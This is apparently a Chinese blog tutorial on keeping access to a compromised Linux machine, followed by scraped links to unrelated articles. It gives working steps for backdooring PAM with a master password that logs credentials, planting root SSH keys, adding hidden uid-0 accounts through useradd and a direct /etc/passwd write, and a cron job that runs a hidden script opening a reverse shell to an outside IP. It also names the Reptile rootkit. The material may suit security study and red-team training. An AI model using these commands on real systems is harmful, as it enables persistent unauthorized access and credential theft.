目录

前言

rookit后门

PAM后门

ssh公私钥免密登录

添加linux账户

计划任务

openssh后门万能密码

前言

上面我们讲了windows权限维持的方法 —> Windows权限维持方法 ,以及当我们拿到一台linux机器时,如何隐藏我们的踪迹 —> Linux权限维持—隐藏踪迹,这里我们讲述下如何植入后门来维持我们获取的权限。

rookit后门

介绍

Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。

rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的

  • 文件级别:一般是通过程序漏洞或者系统漏洞进入系统后,通过修改系统的重要文件来达到隐藏自己的目的。在系统遭受rootkit攻击后,合法的文件被木马程序替代,变成了外壳程序,而其内部是隐藏着的后门程序。
  • 内核级别:是比文件级rootkit更高级的一种入侵方式,它可以使攻击者获得对系统底层的完全控制权,此时攻击者可以修改系统内核,进而截获运行程序向内核提交的命令,并将其重定向到入侵者所选择的程序并运行此程序。

常用的rookit后门工具有Reptile、mafix

Reptile

Reptile是一款rookit后门工具。项目地址:GitHub - Reptile。使用方法可参考:Reptile 一款LKM Linux rootkit后门使用教程 - 3HACK

工具虽然很强大,但是该工具在新的linux下系统不能使用,由于内核问题。本人还觉得其设置过于复杂,连接需要填入的参数过多,并不方便使用。

PAM后门

PAM是一种认证模块,PAM可以作为Linux登录验证和各类基础服务的认证,简单来说就是一种用于Linux系统上的用户身份验证的机制。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(位于/lib/security)进行安全认证

简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持

利用方法:

1、获取目标系统所使用的PAM版本,下载对应版本的pam版本
2、解压缩,修改pam_unix_auth.c文件,添加万能密码
3、编译安装PAM
4、编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即可使用万能密码登陆,并将用户名密码记录到文件中。

参考:https://xz.aliyun.com/t/7902

ssh公私钥免密登录

创建秘钥对,然后将公钥上传到拿下的服务器中,实现root账号免密登录

1. 生成ssh秘钥对

ssh-keygen -t rsa

保存路径输入 ./id_rsa ,保存到当前路径。接着再按两次回车

2.  将id_rsa.pub公钥上传到服务中

3. 将公钥写入到authorized_keys文件中

mkdir /root/.ssh && touch /root/.ssh/authorized_keys
cat id_rsa.pub >> /root/.ssh/authorized_keys && chmod 600 /root/.ssh/authorized_keys && chmod 700 /root/.ssh/

4. 配置允许使用秘钥登录

vim /etc/ssh/sshd_config
RSAAuthentication yes
PubkeyAuthentication yes

5. ssh秘钥登录

ssh -i id_rsa root@192.168.110.131

成功实现秘钥登录

添加linux账户

目标:添加一个uid为0的账号,linux中超级管理员root的uid为0,这里我们再添加一个uid为0的账号

使用useradd添加

#添加账号test1,设置uid为0,密码为123456
useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1

执行后则

#/etc/passwd
test1:x:0:0::/home/test1:/bin/bash
#/etc/shadow
test1:$1$salt$638tR8bROOvPnPklDQ9Vf/:19129:0:99999:7:::

远程连接,权限为root

直接写入/etc/passwd

1. 首先,使用perl语言(Linux自带)生成带有盐值的密码:

perl -le 'print crypt("123456","addedsalt")'

2. 添加test2账号,密码设置为123456

echo "test2:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >>/etc/passwd

计划任务

使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹。

1. 创建反弹shell脚本,vim /etc/.evil.sh

#!/bin/bash
bash -i >& /dev/tcp/39.100.xx.xx/80  0>&1

并加上执行权限

chmod +x /etc/.evil.sh

2. 添加计划任务

我们可以使用crontab -e或者vim /etc/crontab添加计划任务

#添加计划任务
vim /etc/crontab
#查看计划任务
cat /etc/crontab

设置定时任务为每分钟执行一次

#每一分钟执行一次
*/1 * * * * root /etc/.evil.sh

3. 重启cron

service cron restart

然后就可以接收反弹shell

openssh后门万能密码

通过修改SSH源代码的方式来留一个万能的SSH密码。参考:SSH后门万能密码 - 墨鱼菜鸡 - 博客园

方法还有很多~~

相关文章:第4篇:Linux权限维持--后门篇 · 应急响应实战笔记

Linux权限维持—后门篇相关推荐

  1. Linux权限维持之suid后门、ssh后门

    文中主要讲解Linux权限维持中的小技巧,通过了解掌握SUID后门.SSH后门等方式,更快知晓权限维持作用.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿 ...

  2. linux nas解决方案_畅快玩转NAS 篇一:Linux权限简单讲解

    畅快玩转NAS 篇一:Linux权限简单讲解 2020-01-22 19:02:28 35点赞 189收藏 8评论 你是AMD Yes党?还是intel和NVIDIA的忠实簇拥呢?最新一届#装机大师赛 ...

  3. Linux常用命令(本篇包括,Linux目录结构介绍、Linux Shell介绍、9个常见命令介绍、文件的概念、文件的操作(20个)、目录的操作、文件和目录的权限、文件压缩及解压缩)

    Linux常用命令(本篇包括,Linux目录结构介绍.Linux Shell介绍.9个常见命令介绍.文件的概念.文件的操作(20个).目录的操作.文件和目录的权限.文件压缩及解压缩)         ...

  4. 鸟哥的Linux私房菜(基础篇)- 第十四章、Linux 账号管理与 ACL 权限配置

    第十四章.Linux账号管理与 ACL 权限配置 最近升级日期:2009/09/09 要登陆 Linux 系统一定要有账号与口令才行,否则怎么登陆,您说是吧?不过,不同的使用者应该要拥有不同的权限才行 ...

  5. 看完这篇 Linux 权限后,通透了

    我们在使用 Linux 的过程中,或多或少都会遇到一些关于使用者和群组的问题,比如最常见的你想要在某个路径下执行某个指令,会经常出现这个错误提示 . permission denied 反正我大概率见 ...

  6. Linux权限不理解?看完这篇就够用了

    Linux关于用户 Linux的用户分类 Linux用户的切换 su的使用 扩展 sudo的使用 Linux权限的概念 文件的的权限 文件的后缀名 文件权限 更改文件权限 chmod chown ch ...

  7. 鸟哥的Linux私房菜(基础篇)- 第十七章、程序管理与 SELinux 初探

    第十七章.程序管理与 SELinux初探 最近升级日期:2009/09/11 一个程序被加载到内存当中运行,那么在内存内的那个数据就被称为程序(process).程序是操作系统上非常重要的概念,所有系 ...

  8. 后门怎么写隐蔽java_用Java写黑软-后门篇

    这次我给大家带来的是<用Java写黑软-后门篇>,目前我在网上还没有找到哪位高手把自己写的java后门公布出来,有的也多是些恶搞的东西,所以这次我就来献献丑了. 先来一段理论的东西,后门, ...

  9. python通用权限管理框架图_通用权限管理设计篇_设计模式

    摘要: 本文讲的是通用权限管理设计篇_设计模式, 博客地址:http://www.blogjava.net/amigoxie/  一.引言        因为做过的一些系统的权限管理的功能虽然在逐步完 ...

最新文章

  1. C++的 STL堆 实现获取中位数
  2. 有关采用SMIv2 Internet协议的SNMPv2 MIB
  3. Qt 读取XML文档的简单示例
  4. Qt模型、视图解读之视图
  5. 加载特征主数据自动删除重复关键值
  6. C++ explicit 的用法,就是必须显示调用
  7. 算术类型转换、整型提升
  8. Matlab2018a安装成功后,打开出现licensing error:-8523
  9. Springboot启动完毕后提供了立刻执行自定义程序的两个接口类
  10. 自动驾驶红旗车,背后站着小马哥
  11. C#生成JSON数据格式的函数
  12. 文本标注工具之BRAT
  13. 小程序登录(附详细文档)
  14. 笨方法学python 习题31
  15. 对.Net 垃圾回收的C#编程相关方面(Finalize 和Dispose(bool disposing)和 Dispose())的一些理解体会【个人复习+zz】...
  16. Hololens开发笔记
  17. 那些惊艳的算法—时间轮任务调度(sunwind整理)
  18. Student Alcohol Consumption学生酒类消费
  19. HTML中给div加超链接
  20. Docker 从入门到精通(0基础也能看懂的教程)

热门文章

  1. 微信支付服务商模式说明
  2. DXC Technology引领数字化转型 助企业客户拥抱变革
  3. icc色彩配置文件_什么是色彩配置文件?
  4. SWPU Python123作业题汇总(持续更新)
  5. Alexa 又收拾中国网站
  6. java毕业设计——基于java+J2EE+sqlserver的在线考试系统设计与实现(毕业论文+程序源码)——在线考试系统
  7. @value()注解
  8. node.js毕业设计安卓移动LYQ电子商城APP(程序+APP+LW)
  9. 在国内如何使用gmail_如何在Gmail中更快地键入电子邮件
  10. OOP 三大特征之多态(Polymorphism)